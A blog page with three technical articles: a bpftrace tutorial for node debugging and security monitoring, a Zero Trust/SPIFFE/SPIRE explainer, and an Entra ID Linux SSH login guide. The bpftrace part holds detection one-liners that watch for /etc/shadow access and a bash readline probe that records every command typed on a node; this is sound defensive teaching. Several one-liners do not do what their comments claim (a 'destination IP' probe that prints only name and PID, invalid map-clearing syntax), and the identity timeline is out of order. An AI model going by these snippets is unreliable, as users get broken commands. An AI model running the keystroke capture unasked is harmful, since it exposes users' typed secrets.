Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 9
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace**

TL;DR

bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
(think of it like kubectl exec — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)
kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress
Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si
Container PIDs are host-namespace PIDs in bpftrace — use curtask->real_parent->tgid to correlate to container activity

bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don’t know where to look, it’s how you ask the kernel a direct question. That’s what EP09 is about.

Quick Check: Is bpftrace Available on Your Node?

Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:

# SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux && echo "BTF available"

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' --timeout 5

Expected output (abridged):

Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47

Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.

Not on a self-managed node? EKS managed nodes and GKE nodes don’t have bpftrace pre-installed, but you can run it from a privileged debug pod: kubectl debug node/<node-name> -it --image=quay.io/iovisor/bpftrace. The tool runs on the host kernel — you get full kernel visibility even from a pod.

A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.

I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.

I ran one command:

bpftrace -e 'kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); }' --timeout 10

Ten seconds of sampling. The histogram output showed a single process — backup-agent — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.

Found in 9 seconds. War room averted.

What made that possible is something most engineers don’t know about bpftrace: that one-liner is not a monitoring query. It’s a complete eBPF program — compiled, loaded into the kernel, attached to the tcp_recvmsg kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.

What bpftrace Actually Is

bpftrace is not a monitoring tool. It’s an eBPF compiler with a high-level scripting language designed for one-shot investigation.

When you run bpftrace -e 'kretprobe:tcp_recvmsg { ... }', this is what happens:

Your one-liner
      ↓
bpftrace's built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or --timeout
      ↓
Output printed, maps freed, program detached

The kernel doesn’t know bpftrace wrote the program. It’s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.

This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.

The Four Probe Types You’ll Use Most

bpftrace supports 20+ probe types. These four cover 90% of production debugging:

kprobe / kretprobe — Kernel Functions

Attaches to the entry (kprobe) or return (kretprobe) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.

# Fire on every call to tcp_connect — who's making new TCP connections?
bpftrace -e 'kprobe:tcp_connect { printf("%s PID %d connecting\n", comm, pid); }'

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e 'kretprobe:tcp_recvmsg { @[comm] = hist(retval); }'

# Count calls to vfs_write per process (file write activity)
bpftrace -e 'kprobe:vfs_write { @[comm] = count(); }'

Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.

kprobe instability: A function targeted by a kprobe can be inlined by the kernel compiler — the compiler embeds the function’s code at its call sites with no separate entry point. When that happens, the kprobe silently fires on nothing. Verify before relying on one: bpftrace -l 'kprobe:function_name' — empty response means it was inlined. Use a tracepoint equivalent instead.

tracepoint — Stable Kernel Trace Points

Tracepoints are stable, versioned hooks explicitly placed in the kernel source. Unlike kprobes, they are part of the kernel’s public interface and guaranteed not to disappear between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.

# Every file open — process name + filename
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%s %s\n", comm, str(args->filename));
}'

# Every outbound connect — process, destination IP and port
bpftrace -e 'tracepoint:syscalls:sys_enter_connect {
    printf("%-16s %-6d\n", comm, pid);
}'

# List all available tracepoints (hundreds)
bpftrace -l 'tracepoint:syscalls:*' | head -30

uprobe — Userspace Function Probes

Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.

# What bash commands are being typed on this node?
bpftrace -e 'uprobe:/bin/bash:readline { printf("%s\n", str(arg0)); }'

# Python function calls
bpftrace -e 'uprobe:/usr/bin/python3:PyObject_Call { printf("Python call: pid %d\n", pid); }'

From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they’ve obtained on your node — in real time, from the kernel, without touching the terminal session.

interval — Periodic Sampling

Runs a block of code on a fixed interval. Used for aggregation and periodic stats.

# Print the top file-opening processes every 5 seconds
bpftrace -e '
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
'

The One-Liner Toolkit: Runnable Right Now

These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):

# What files is every process opening right now? (30-second view)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%-16s %s\n", comm, str(args->filename));
}' --timeout 30

# Who is making DNS queries? (catches queries from any container, no sidecar needed)
bpftrace -e 'tracepoint:net:net_dev_xmit {
    if (args->skbaddr->protocol == 0x0800) printf("%s\n", comm);
}'

# Latency histogram for all read() syscalls — find the slow process
bpftrace -e '
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read  {
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}' --timeout 15

# Which process is using the most CPU right now? (99Hz sampling)
bpftrace -e 'profile:hz:99 { @[comm] = count(); }' --timeout 10

# Real-time syscall frequency — find unusual process activity
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm, args->id] = count(); }' --timeout 10 \
  | sort -k3 -rn | head -20

# New TCP connections in the last 30 seconds — source and dest
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    printf("%-16s → %s:%d\n", comm,
           ntop(AF_INET, $sk->__sk_common.skc_daddr),
           $sk->__sk_common.skc_dport >> 8);
}' --timeout 30

# What is a specific PID doing? (replace 12345)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf("%s\n", str(args->filename));
}'

Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.

The Security Use Cases

Watching an Active Session

If you suspect a process is running commands you didn’t deploy:

# See every bash command on this node in real time
bpftrace -e 'uprobe:/bin/bash:readline { printf("%s %s\n", comm, str(arg0)); }'

# Every process spawn — PID, parent, command
bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%-6d %-6d %s\n", pid, curtask->real_parent->tgid, str(args->filename));
}'

This is the kernel-level version of watching /var/log/auth.log — except it can’t be suppressed by an attacker who has root, because the probe runs in kernel space. An attacker who has compromised a container with root inside the container cannot prevent a bpftrace program on the host from observing their syscalls.

Detecting Unexpected Network Activity

# Any process making a connection to a non-standard port
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $port = $sk->__sk_common.skc_dport >> 8;
    if ($port != 80 && $port != 443 && $port != 53) {
        printf("%-16s port %d\n", comm, $port);
    }
}'

# DNS queries to non-standard resolvers (anything not on port 53)
bpftrace -e 'tracepoint:syscalls:sys_enter_sendto {
    if (args->addr->sa_family == 2) {
        printf("%-16s → %s\n", comm, str(args->addr));
    }
}'

Watching File Access on Sensitive Paths

# Any access to /etc/passwd, /etc/shadow, /root/
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    if (str(args->filename) == "/etc/passwd" ||
        str(args->filename) == "/etc/shadow") {
        printf("%-16s PID %-6d opened %s\n", comm, pid, str(args->filename));
    }
}'

Production Gotchas

CPU overhead: bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (vfs_read, sys_enter_* without filtering) can add 10–20% overhead. Always test with --timeout and watch %si before running on a production node.

Maps grow unbounded by default: @[comm] = count() will accumulate an entry per unique comm value forever in the current session. Use clear(@) in an interval block, or set a key limit: @[comm] = count(); if (@[comm] > 100) { clear(@comm); }.

kprobe instability: Functions targeted by kprobes can be inlined by the compiler between kernel versions, making the probe silently ineffective. If a kprobe isn’t firing, verify the function exists: bpftrace -l 'kprobe:function_name'. If it returns nothing, the function was inlined. Use a tracepoint equivalent instead.

Container PIDs: PIDs inside a container are different from host PIDs. pid in bpftrace is the host namespace PID.

Container PID semantics: When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned). bpftrace’s pid built-in always gives you the host-namespace PID. To map a container’s PID to the host PID: cat /proc/<host-pid>/status | grep NSpid — the second value is the PID inside the container. Or use curtask->real_parent->tgid in your probe to walk the process tree. This matters when you filter by pid in a one-liner and get no output — you may be filtering on the container-namespace PID instead of the host one.

BTF requirement: bpftrace requires BTF for struct field access ($sk->__sk_common.skc_daddr). If BTF is unavailable, struct access fails. Check /sys/kernel/btf/vmlinux exists before running struct-access one-liners.

Quick Reference

Probe type	Syntax	Use for
kernel function entry	`kprobe:function_name`	Function arguments
kernel function return	`kretprobe:function_name`	Return value, latency
kernel tracepoint	`tracepoint:subsys:name`	Stable, versioned hooks
userspace function	`uprobe:/path/to/bin:function`	App-level observation
CPU sampling	`profile:hz:99`	Flamegraphs, hot code
interval	`interval:s:N`	Periodic aggregation
process start	`tracepoint:syscalls:sys_enter_execve`	New process detection

Built-in variable	Value
`pid`	Process ID (host namespace)
`tid`	Thread ID
`comm`	Process name (15 chars)
`nsecs`	Nanoseconds since boot
`curtask`	Pointer to `task_struct`
`retval`	Return value (kretprobe/tracepoint exit)
`args`	Probe arguments struct

Key Takeaways

bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space
Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si

What’s Next

bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.

Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says “timeout” and the kernel says “retransmit storm to one specific endpoint,” the kernel is right.

Next: network flow observability at the kernel level

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

May 10, 2026May 9, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

The Identity Stack, Episode 13
EP12: Entra ID + Linux → EP13

TL;DR

Zero Trust means “never trust, always verify” — identity is verified continuously, not just at login time; network location provides no implicit trust
Human identity (users) and workload identity (services, pods, jobs) are separate problems — LDAP/Kerberos/OIDC solve the human side; SPIFFE/SPIRE solve the workload side
SPIFFE (Secure Production Identity Framework For Everyone) defines a standard for workload identity — a SPIFFE ID is a URI like spiffe://corp.com/ns/prod/sa/payments-svc
SPIRE (SPIFFE Runtime Environment) issues short-lived X.509 SVIDs (SPIFFE Verifiable Identity Documents) to workloads — certificates that rotate automatically, every hour
mTLS (mutual TLS) is how workloads prove identity to each other — both sides present certificates; no passwords, no API keys
The evolution: /etc/passwd (1970) → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been the same; the trust boundary keeps moving outward

The Big Picture: From /etc/passwd to Zero Trust

1970s  /etc/passwd              ← trust: the local machine
       One machine, one user list

1984   NIS / Yellow Pages       ← trust: the local network
       Centralized, but cleartext, flat

1993   LDAP                     ← trust: the directory server
       Hierarchical, scalable, encrypted (eventually)

1988   Kerberos                 ← trust: the KDC
       Tickets instead of passwords, network-wide

2002   SAML                     ← trust: the IdP assertion
       Identity crosses the internet

2014   OIDC / OAuth2            ← trust: the JWT signature
       API-native, mobile-native, developer-native

2017   SPIFFE / SPIRE           ← trust: the workload certificate
       Automated identity for services, not humans

2026   Zero Trust               ← trust: nothing, verify everything
       Continuous verification, short-lived credentials,
       device posture, behavioral signals

EP01 of this series started with the chaos of per-machine /etc/passwd. This episode — EP13 — closes the loop: from that chaos to a model where identity is verified continuously, credentials expire in hours not years, and the network provides no implicit trust.

The Assumption That Zero Trust Rejects

Traditional security assumed: if you’re on the internal network, you’re trusted. A VPN user was treated as equivalent to someone at a desk in the office. A service running on the same Kubernetes node as another service was implicitly trusted.

That assumption broke in practice:

Compromised VPN credentials gave attackers full internal access
Lateral movement after initial compromise was easy — once inside, everything trusted you
Perimeter-based security had no visibility into east-west traffic (service-to-service)

Zero Trust inverts the model: the network provides no trust. Every access request is verified — user or service, internal or external, first request or hundredth. Trust is dynamic, contextual, and short-lived.

Human Zero Trust: Continuous Verification

For human users, Zero Trust extends OIDC and Conditional Access:

Short-lived tokens. Access tokens expire in 1 hour (OIDC standard). Refresh tokens are revocable. A user who is terminated can have their refresh tokens revoked in Entra ID — the next time their app tries to use the refresh token, it fails. The maximum blast radius of a stolen token is bounded by its lifetime.

Device posture. The device the user authenticates from is part of the identity assertion. Conditional Access can require: device is managed (Intune-enrolled), device is compliant (no malware, full-disk encryption enabled, OS patched). A valid user credential from an unmanaged device is denied.

Behavioral signals. Entra ID Identity Protection and similar systems analyze login patterns — unusual location, impossible travel (login from Mumbai, then New York 5 minutes later), unfamiliar device. High-risk sign-ins trigger step-up authentication or are blocked automatically.

Privileged Access Management (PAM). For privileged operations (production shell access, AD admin), Zero Trust adds time-bounded just-in-time access:

Request:  "I need admin access to db01.corp.com for 2 hours to investigate an incident"
Approval: Manager approves via Slack/email/ticketing system
Grant:    Temporary role assignment or password checkout from the PAM vault
Access:   User SSHes with a one-time or time-limited credential
Expire:   Credential automatically revoked after 2 hours
Audit:    Full session recording available for review

CyberArk, BeyondTrust, and HashiCorp Vault implement this model. Vault’s SSH Secrets Engine issues short-lived SSH certificates:

# Request a signed SSH certificate (valid 30 minutes)
vault ssh \
  -role=prod-admin \
  -mode=ca \
  -mount-point=ssh-client-signer \
  [email protected]

# Vault issues a certificate signed by the server's trusted CA
# sshd on db01 trusts that CA — no authorized_keys needed
# Certificate expires in 30 minutes — no cleanup required

Workload Identity: The Non-Human Problem

Services don’t have passwords they can type. A microservice calling another microservice needs to prove its identity — but you can’t give a Kubernetes pod a static API key (it’ll be in a config file, in a git repo, or in a crash dump within 6 months).

Workload identity solves this with short-lived, automatically rotated certificates — the service’s identity is its certificate, issued by a trusted CA, expiring in minutes to hours.

Traditional:                     Zero Trust:
  payments-svc → orders-svc        payments-svc → orders-svc
  Authentication: API key           Authentication: mTLS (X.509 cert)
  "Bearer sk_live_abc123"           cert: spiffe://corp.com/ns/prod/sa/payments-svc
  Rotation: manual (rarely done)    Rotation: automatic, every hour
  Revocation: change the key        Revocation: cert expires; new cert issued
  Audit: "API key was used"         Audit: "spiffe://payments-svc → spiffe://orders-svc"

SPIFFE: The Standard

SPIFFE (Secure Production Identity Framework For Everyone) defines what a workload identity looks like. The core concept is the SPIFFE ID — a URI in the format:

spiffe://<trust-domain>/<workload-path>

Examples:
  spiffe://corp.com/ns/prod/sa/payments-svc
  spiffe://corp.com/region/us-east/service/auth-api
  spiffe://corp.com/k8s/cluster-prod/namespace/payments/pod/payments-svc-abc123

The trust domain (corp.com) is the organizational boundary. The path is the workload identifier — typically encoding namespace, service account, or cluster information.

A SPIFFE ID is embedded in an SVID (SPIFFE Verifiable Identity Document) — either an X.509 certificate (X.509-SVID) or a JWT (JWT-SVID). The X.509-SVID is the standard form: the SPIFFE ID appears in the certificate’s Subject Alternative Name (SAN) field.

X.509 Certificate (SVID):
  Subject: CN=payments-svc
  SAN: URI=spiffe://corp.com/ns/prod/sa/payments-svc
  Validity: 1 hour
  Issuer: SPIRE Intermediate CA
  Signed by: corp.com trust bundle

Any service that has the corp.com trust bundle (the CA certificate chain) can verify that a certificate with spiffe://corp.com/... in the SAN was issued by the authorized CA for that trust domain.

SPIRE: The Runtime

SPIRE (SPIFFE Runtime Environment) is the reference implementation that issues SVIDs to workloads.

SPIRE Server
  ├── Node attestation: verifies the identity of the node/VM
  │   (AWS instance identity document, GCP service account, k8s node SA)
  └── Workload attestation: verifies the identity of the process
      (Kubernetes SA, Unix UID/GID, Docker container labels)
         │
         │ issues X.509 SVIDs (short-lived, auto-rotated)
         ▼
SPIRE Agent (runs on every node)
         │
         │ SPIFFE Workload API (Unix socket)
         ▼
Workload (your service)
  → gets its own certificate
  → gets the trust bundle (CA certs of trusted domains)
  → uses cert for mTLS with other services

The workload fetches its identity via the Workload API socket — no environment variables, no file mounts. The SPIRE Agent pushes new certificates before the old ones expire. Rotation is transparent to the workload.

# On a node with SPIRE Agent running:
# Fetch the SVID for the current workload
spire-agent api fetch x509 \
  -socketPath /run/spire/sockets/agent.sock

# Output shows:
# SPIFFE ID: spiffe://corp.com/ns/prod/sa/payments-svc
# Certificate: (PEM)
# Trust bundle: (PEM of issuing CA chain)
# Expires: 2026-04-27T02:00:00Z (1 hour from now)

mTLS: Both Sides Show ID

Mutual TLS (mTLS) is what makes SPIFFE useful operationally. In standard TLS, only the server presents a certificate — the client just verifies it. In mTLS, both sides present certificates. Both sides verify the other’s certificate against the trust bundle.

payments-svc → orders-svc connection:

TLS handshake:
  payments-svc presents: spiffe://corp.com/ns/prod/sa/payments-svc cert
  orders-svc presents:   spiffe://corp.com/ns/prod/sa/orders-svc cert

  Both verify:
    • cert signed by trusted CA (the corp.com SPIRE CA)
    • cert not expired
    • SPIFFE ID in SAN matches what's expected

  After handshake: encrypted channel, both sides verified
  Authorization: orders-svc checks its policy:
    "is spiffe://corp.com/ns/prod/sa/payments-svc allowed to call /api/orders?"

Service meshes (Istio, Linkerd, Consul Connect) implement mTLS transparently — the application doesn’t handle certificates; the sidecar proxy does. In Istio’s case, Citadel (now istiod) acts as the SPIFFE-compatible CA, issuing certificates to envoy sidecars. The application code doesn’t change.

Open Policy Agent: Authorization After Identity

Zero Trust separates identity from authorization. Once you know who the caller is (SPIFFE ID, OIDC token, user cert), a policy engine decides what they can do.

OPA (Open Policy Agent) is the standard for this:

# opa-policy.rego
package authz

# payments-svc can read orders; nothing else can write orders
allow {
  input.caller == "spiffe://corp.com/ns/prod/sa/payments-svc"
  input.method == "GET"
  startswith(input.path, "/api/orders")
}

default allow = false

The service checks OPA on each request: “caller=X wants to do Y to Z — allowed?” OPA evaluates the policy and returns a decision. The policy is version-controlled, tested, and deployed independently of the service.

⚠ Common Misconceptions

“Zero Trust means no trust.” Zero Trust means trust is earned dynamically through verification, not granted by network location. A verified user with a valid, compliant device and MFA is trusted — for the scope and duration of the verified session. The “zero” refers to implicit trust, not trust itself.

“SPIFFE replaces OIDC.” SPIFFE is for workload (service) identity. OIDC is for human (user) identity. They complement each other — a service has a SPIFFE identity; a user has an OIDC identity; the authorization layer accepts both.

“mTLS is complex to implement.” With a service mesh (Istio, Linkerd), mTLS is transparent — the sidecar handles it. Without a service mesh, the application needs to use the SPIFFE Workload API. The complexity is real but manageable, especially compared to the alternative of static API keys.

Framework Alignment

Domain	Relevance
CISSP Domain 5: Identity and Access Management	Zero Trust extends IAM to workloads (SPIFFE) and continuous verification (short-lived tokens, device posture) — it’s the current frontier of identity architecture
CISSP Domain 3: Security Architecture and Engineering	The separation of identity (SPIFFE ID), authentication (mTLS), and authorization (OPA) is a clean architectural decomposition that scales to complex multi-service environments
CISSP Domain 4: Communications and Network Security	mTLS encrypts and authenticates every service-to-service connection — it eliminates the assumption that east-west traffic on the internal network is safe
CISSP Domain 1: Security and Risk Management	Zero Trust is a risk management posture — it accepts that perimeter breach is inevitable and limits blast radius through continuous verification and least-privilege

Key Takeaways

Zero Trust rejects network-based implicit trust — every request is verified regardless of source
Human identity: short-lived OIDC tokens, device posture checks, Conditional Access, JIT privileged access (Vault, CyberArk)
Workload identity: SPIFFE IDs in X.509 certificates, issued by SPIRE, rotated automatically every hour — no static API keys
mTLS lets services verify each other’s identity at the TLS layer — service meshes (Istio, Linkerd) implement it transparently
OPA handles authorization after identity is established — who you are ≠ what you can do
The series arc: /etc/passwd → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been “how do you know who someone is, at scale, without trusting the network?” The answer keeps getting better.

What does identity look like at your organization — still static API keys and shared service accounts, or moving toward SPIFFE and short-lived credentials? 👇

The Identity Stack: From LDAP to Zero Trust — 13 episodes complete.

Start from EP01: What Is LDAP →

Entra ID Linux Login: SSH Authentication with Azure AD Credentials

May 10, 2026May 9, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

The Identity Stack, Episode 12
EP11: Identity Providers → EP12 → EP13: Zero Trust Identity → …

TL;DR

Entra ID (Azure AD) Linux login lets you SSH into a VM using your Azure AD credentials — no local Linux accounts, no SSH keys to distribute
The stack: aad-auth package + pam_aad.so + SSSD — Azure authenticates via OIDC device code flow or password, then maps the identity to a local Linux UID
Entra ID is not AD — it’s OIDC/OAuth2 native, with no LDAP and no Kerberos (unless you add Azure AD DS, a separate managed service)
Conditional Access Policies can gate Linux logins — MFA, device compliance, location restrictions — the same policies as for web apps
Two login modes: interactive (browser-based device code, for non-Azure VMs) and integrated (Azure IMDS-based, for Azure VMs)
Required roles: Virtual Machine Administrator Login or Virtual Machine User Login on the VM — IAM, not local sudoers

User: ssh [email protected]

  sshd on Linux VM
      │
      ▼
  PAM (/etc/pam.d/sshd)
      │
      ├── pam_aad.so (auth)
      │     │
      │     │  OIDC device code flow:
      │     │  "Go to microsoft.com/devicelogin and enter code ABCD-1234"
      │     │  User authenticates in browser with MFA
      │     │  Entra ID issues id_token + access_token
      │     ▼
      │   pam_aad validates token:
      │     • signature (JWKS from Entra ID)
      │     • tenant ID (iss claim)
      │     • VM resource audience (aud claim)
      │     • group membership (groups claim)
      │
      └── pam_mkhomedir (session)
            Creates /home/[email protected] on first login

  Shell session created
  whoami → vamshi_corp_com (sanitized UPN for Linux username)

EP11 mapped the IdP landscape. This episode gets specific: Entra ID and Linux. Understanding this matters because Entra ID is increasingly where enterprise identities live, and cloud VMs that SSH into with local accounts are an operational and security liability.

Entra ID vs Active Directory: What’s Different

This distinction matters before configuring anything.

	Active Directory (on-prem)	Entra ID (cloud)
Protocol	LDAP + Kerberos	OIDC + OAuth2
Directory queries	`ldapsearch`	Microsoft Graph API
Linux join	`realm join` (adcli + SSSD)	`aad-auth` package
Authentication	Kerberos tickets	JWT tokens
Group policy	GPO via Sysvol	Conditional Access + Intune
Network requirement	DC reachable on LAN/VPN	HTTPS to login.microsoftonline.com

Entra ID has no LDAP interface and no Kerberos realm. You cannot run ldapsearch against it. You cannot kinit to it. The authentication protocol is entirely OIDC/OAuth2 — the same protocol your browser uses to “Login with Microsoft.”

If you need LDAP and Kerberos from Azure, that’s Azure AD Domain Services — a separate managed service that Microsoft runs, which does speak LDAP and Kerberos. It’s not Entra ID; it’s a managed AD replica in Azure. EP12 covers the Entra ID path — the modern, protocol-native approach.

Prerequisites

# Azure side:
# 1. The VM's managed identity must be enabled (System-assigned)
# 2. Two Entra ID roles assigned on the VM resource:
#    - "Virtual Machine Administrator Login" (for sudo access)
#    - "Virtual Machine User Login" (for regular access)
# 3. Conditional Access policies that apply to the VM login scope

# VM side (Ubuntu 20.04+ / RHEL 8+):
# Install the aad-auth package (Microsoft-maintained)
curl -sSL https://packages.microsoft.com/keys/microsoft.asc \
  | gpg --dearmor -o /usr/share/keyrings/microsoft.gpg
echo "deb [signed-by=/usr/share/keyrings/microsoft.gpg] \
  https://packages.microsoft.com/ubuntu/22.04/prod jammy main" \
  > /etc/apt/sources.list.d/microsoft.list
apt-get update && apt-get install -y aad-auth

Configuration

# Configure the aad-auth package
aad-auth configure \
  --tenant-id 12345678-1234-1234-1234-123456789abc \
  --app-id 87654321-4321-4321-4321-cba987654321

# This writes /etc/aad.conf:
# [aad]
# tenant_id = 12345678-...
# app_id = 87654321-...
# version = 1

# Verify the PAM configuration was updated
grep pam_aad /etc/pam.d/common-auth
# auth [success=1 default=ignore] pam_aad.so

The aad-auth package installs pam_aad.so and configures PAM automatically. It also modifies /etc/nsswitch.conf to add aad as a source for passwd lookups — so getent passwd [email protected] works after the first login.

On an Azure VM (Integrated mode)

Azure VMs have access to the Instance Metadata Service (IMDS) at 169.254.169.254. pam_aad uses the VM’s managed identity to get a token from IMDS, which proves the VM is trusted, then validates the user’s token against the tenant.

# User SSHes with username as UPN ([email protected] or [email protected])
ssh [email protected]@vm.eastus.cloudapp.azure.com

# Or use the short form if the tenant is configured:
ssh [email protected]@vm.eastus.cloudapp.azure.com

On first connection, pam_aad initiates the device code flow:

To sign in, use a web browser to open https://microsoft.com/devicelogin
and enter the code ABCD-1234 to authenticate.

The user opens the URL in any browser (on any device), enters the code, and authenticates with their Entra ID credentials + MFA. The SSH session gets a token. Subsequent logins within the token cache TTL skip the device code step.

Username format on the Linux system

Entra ID usernames (UPNs) contain @ — not valid in Linux usernames. aad-auth sanitizes the UPN:

[email protected] → vamshi_corp_com    (default)
# or, with shorter_username enabled in /etc/aad.conf:
[email protected] → vamshi

The UID is derived from the Azure AD Object ID (a deterministic hash) — stable across logins, same UID on every VM in the tenant.

Conditional Access for Linux Logins

Conditional Access Policies in Entra ID apply to Linux VM logins the same way they apply to web app logins.

Policy: Require MFA for Linux VM Login
  Conditions:
    Cloud apps: "Azure Linux Virtual Machine Sign-In"
    Users: All users (or specific groups)
  Grant:
    Require multi-factor authentication
    Require compliant device (optional)

With this policy, every SSH login triggers MFA — regardless of whether the client machine supports it. The MFA challenge appears in the device code flow (the browser window the user opens).

You can also enforce:
– Location restrictions — only from corporate IP ranges
– Device compliance — device must be Intune-managed
– Sign-in risk — block logins flagged as risky by Entra ID Identity Protection

This is the operational shift: Linux login security is now managed in the same Conditional Access policy engine as every other Entra ID-protected resource. No more per-machine PAM configuration for MFA.

Role-Based Access: Who Can Log In

Access to the VM is controlled by Azure RBAC — not by local Linux groups or sudoers.

# Grant a user SSH access to the VM
az role assignment create \
  --assignee [email protected] \
  --role "Virtual Machine User Login" \
  --scope /subscriptions/SUB_ID/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/VM_NAME

# Grant admin (sudo) access
az role assignment create \
  --assignee [email protected] \
  --role "Virtual Machine Administrator Login" \
  --scope /subscriptions/SUB_ID/...

Virtual Machine Administrator Login maps to the sudo group on the Linux VM. Users with this role get passwordless sudo. Users with Virtual Machine User Login get a regular shell.

The mapping is enforced by pam_aad checking the groups claim in the token against the configured admin group. No /etc/sudoers.d/ files needed.

Debugging Entra ID Linux Logins

# Check aad-auth service status
systemctl status aad-auth

# View aad-auth logs
journalctl -u aad-auth -f

# Attempt a manual token validation (requires aad-auth debug mode)
aad-auth login --username [email protected]

# Check the local user cache
getent passwd vamshi_corp_com
# Returns if the user has logged in before

# Clear the local cache (forces re-authentication)
aad-auth clean-cache

# Verify Conditional Access isn't blocking (check Entra ID Sign-in logs)
# Azure Portal → Entra ID → Sign-in logs → filter by user + app "Azure Linux VM Sign-In"

The Entra ID Sign-in logs in the Azure Portal show every authentication attempt, the Conditional Access policies that evaluated, which ones passed/failed, and the exact failure reason. This is far more diagnostic than reading PAM logs.

Entra ID Connect: Bringing On-Prem Users to Entra ID

For organizations with existing on-prem AD who want to enable Entra ID Linux login:

On-prem AD users → Entra ID Connect sync → Entra ID
                                                │
                                    Linux VM login (aad-auth)

Entra ID Connect is a Windows Server application that syncs users from on-prem AD to Entra ID every 30 minutes. Users authenticate against Entra ID (which validates against AD via Password Hash Sync, Pass-Through Authentication, or Federation). The Linux VM doesn’t know or care — it sees an Entra ID token.

With Password Hash Sync: password hashes (not plaintext) are synced to Entra ID — users authenticate directly in the cloud.
With Pass-Through Authentication: Entra ID forwards authentication requests to an on-prem agent that validates against AD — no password hashes leave the datacenter.
With Federation (AD FS / Entra ID as a relying party): Entra ID delegates authentication to AD FS — the most complex, the most on-prem control.

⚠ Common Misconceptions

“Entra ID = Azure Active Directory = Active Directory.” Three different things. Active Directory: on-prem, LDAP+Kerberos. Azure AD (now Entra ID): cloud, OIDC+OAuth2. Azure AD Domain Services: managed AD replica in Azure, LDAP+Kerberos, not Entra ID.

“You need Azure AD DS to join Linux to Azure.” Azure AD DS is the managed AD service. Entra ID Linux login (via aad-auth) is entirely separate and doesn’t require AD DS. You can authenticate Linux to Entra ID directly via OIDC.

“The Linux username matches the Entra ID username.” The UPN is sanitized (@ → _) to produce a valid Linux username. The canonical identity is the UPN or the Entra Object ID. Don’t hardcode the sanitized username in scripts.

